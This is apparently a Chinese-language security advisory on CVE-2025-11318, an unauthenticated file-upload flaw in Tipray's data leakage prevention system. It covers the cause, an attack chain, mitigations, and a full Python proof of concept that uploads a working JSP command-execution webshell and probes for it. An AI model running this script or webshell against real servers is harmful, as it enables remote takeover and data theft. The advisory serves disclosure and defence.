CVE-2025-11318：天锐数据泄露防护系统任意文件上传漏洞

漏洞信息

漏洞编号

CVE-2025-11318

漏洞类型

任意文件上传（Unrestricted File Upload）

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tipray 厦门天锐科技股份有限公司天锐数据泄露防护系统（Data Leakage Prevention System）

漏洞概述

CVE-2025-11318是厦门天锐科技股份有限公司（Tipray）旗下天锐数据泄露防护系统（Data Leakage Prevention System，DLP）1.0版本中存在的一个高危安全漏洞。该漏洞位于系统的 uploadWxFile.do 文件中，属于任意文件上传类型的漏洞。攻击者可以通过远程方式，在无需认证和无需用户交互的情况下，通过操纵上传参数 File，将恶意文件上传至目标服务器，从而可能导致远程代码执行、服务器被控等严重后果。

该漏洞的CVSS 3.1评分为7.3分，属于高危级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需权限（PR:N），无需用户交互（UI:N），对机密性、完整性和可用性均存在低程度影响。漏洞已于2025年10月6日公开披露，相关的漏洞利用代码（PoC）已在GitHub等公开渠道发布，攻击者可轻易获取并利用此漏洞。值得注意的是，在漏洞披露前，安全研究人员曾尝试联系天锐科技厂商，但厂商未对此做出任何回应，这进一步增加了该漏洞被恶意利用的风险。

天锐数据泄露防护系统是一款用于防止企业敏感数据泄露的安全产品，其本身定位为安全防护工具。然而，该产品自身存在严重的安全漏洞，这一讽刺性的事实凸显了安全产品在开发过程中安全审计的重要性。一旦该漏洞被攻击者利用，可能导致企业部署的DLP系统被攻破，反而成为数据泄露的入口，对企业信息安全构成严重威胁。

技术细节

该漏洞存在于天锐数据泄露防护系统1.0版本的 uploadWxFile.do 接口中。该接口负责处理文件上传功能，但未对上传文件的类型、扩展名和内容进行充分的验证和过滤。

漏洞原理：uploadWxFile.do 接口在处理客户端上传的 File 参数时，缺乏以下关键安全控制：
1. 未对上传文件的扩展名进行白名单校验，允许上传 .jsp、.aspx、.php 等可执行脚本文件；
2. 未对上传文件的 MIME 类型进行严格检查；
3. 未对上传文件的内容进行恶意代码检测；
4. 上传后的文件存储路径可被直接访问。

利用方式：
1. 攻击者首先通过信息收集手段获取目标天锐数据泄露防护系统的部署地址；
2. 构造恶意的HTTP POST请求，目标是 uploadWxFile.do 接口；
3. 在请求中通过 File 参数上传一个包含恶意代码的WebShell文件（如JSP木马），文件名可伪装为合法文件类型；
4. 由于服务器未对文件类型进行校验，恶意文件被成功上传至服务器的Web可访问目录；
5. 攻击者通过浏览器或其他工具直接访问上传的恶意文件，即可执行任意系统命令，实现对服务器的完全控制。

该漏洞利用难度低，无需任何认证信息，攻击者可从远程直接发起攻击，属于典型的低门槛高危害漏洞。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎、Shodan等工具搜索暴露在公网上的天锐数据泄露防护系统，识别目标系统的部署地址和端口。

STEP 2

步骤2：漏洞探测

攻击者访问目标系统的 uploadWxFile.do 接口，确认该接口存在且可访问，验证文件上传功能是否可用。

STEP 3

步骤3：构造恶意文件

攻击者构造包含恶意代码的WebShell文件（如JSP、ASP等），该文件能够在服务器上执行任意系统命令。

STEP 4

步骤4：上传恶意文件

攻击者通过 uploadWxFile.do 接口上传恶意文件，由于系统未对文件类型进行校验，恶意文件被成功上传至服务器。

STEP 5

步骤5：执行恶意代码

攻击者通过浏览器访问上传的WebShell文件，利用其中的命令执行功能获取服务器控制权。

STEP 6

步骤6：后续渗透

攻击者在获得服务器权限后，可进行内网渗透、数据窃取、植入后门等进一步攻击活动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11318 - Tipray DLP System Arbitrary File Upload PoC
# Vulnerability: Unrestricted File Upload in uploadWxFile.do
# Affected Product: Tipray Data Leakage Prevention System 1.0

import requests

# Target URL of the vulnerable Tipray DLP system
target_url = "http://target-ip:port"

# Malicious JSP webshell content
webshell_content = """<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.util.*,java.io.*"%>
<%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh", "-c", cmd});
    BufferedReader br = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = br.readLine()) != null) {
        out.println(line);
    }
}
%>"""

# Step 1: Upload malicious file via the vulnerable endpoint
upload_url = target_url + "/uploadWxFile.do"

# Prepare the multipart form data with the malicious file
files = {
    "File": ("shell.jsp", webshell_content, "application/octet-stream")
}

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
}

print("[*] Attempting to upload webshell to: " + upload_url)
response = requests.post(upload_url, files=files, headers=headers, timeout=10)
print("[*] Upload response status: " + str(response.status_code))
print("[*] Upload response body: " + response.text)

# Step 2: Try to access the uploaded webshell (path may vary based on server configuration)
# Common upload paths to try
upload_paths = [
    "/upload/shell.jsp",
    "/uploads/shell.jsp",
    "/file/shell.jsp",
    "/wxfile/shell.jsp",
    "/uploadWxFile/shell.jsp"
]

for path in upload_paths:
    shell_url = target_url + path
    print("[*] Trying to access webshell at: " + shell_url)
    try:
        shell_response = requests.get(shell_url + "?cmd=id", timeout=5)
        if shell_response.status_code == 200 and "uid=" in shell_response.text:
            print("[+] Webshell accessible! Command execution confirmed!")
            print("[+] Output: " + shell_response.text)
            break
    except Exception as e:
        print("[-] Failed: " + str(e))

影响范围

Tipray 天锐数据泄露防护系统 1.0

防御指南

临时缓解措施

在厂商发布正式补丁之前，建议采取以下临时缓解措施：1）通过网络访问控制（ACL）限制 uploadWxFile.do 接口的访问范围，仅允许可信IP地址访问；2）在Web服务器层面配置规则，拒绝上传可执行脚本文件（如.jsp、.php、.aspx等）；3）部署Web应用防火墙（WAF），添加针对文件上传漏洞的防护规则；4）监控 uploadWxFile.do 接口的访问日志，及时发现异常上传行为；5）定期检查服务器上传目录，发现可疑文件立即删除；6）对DLP系统进行网络隔离，避免直接暴露在公网环境中。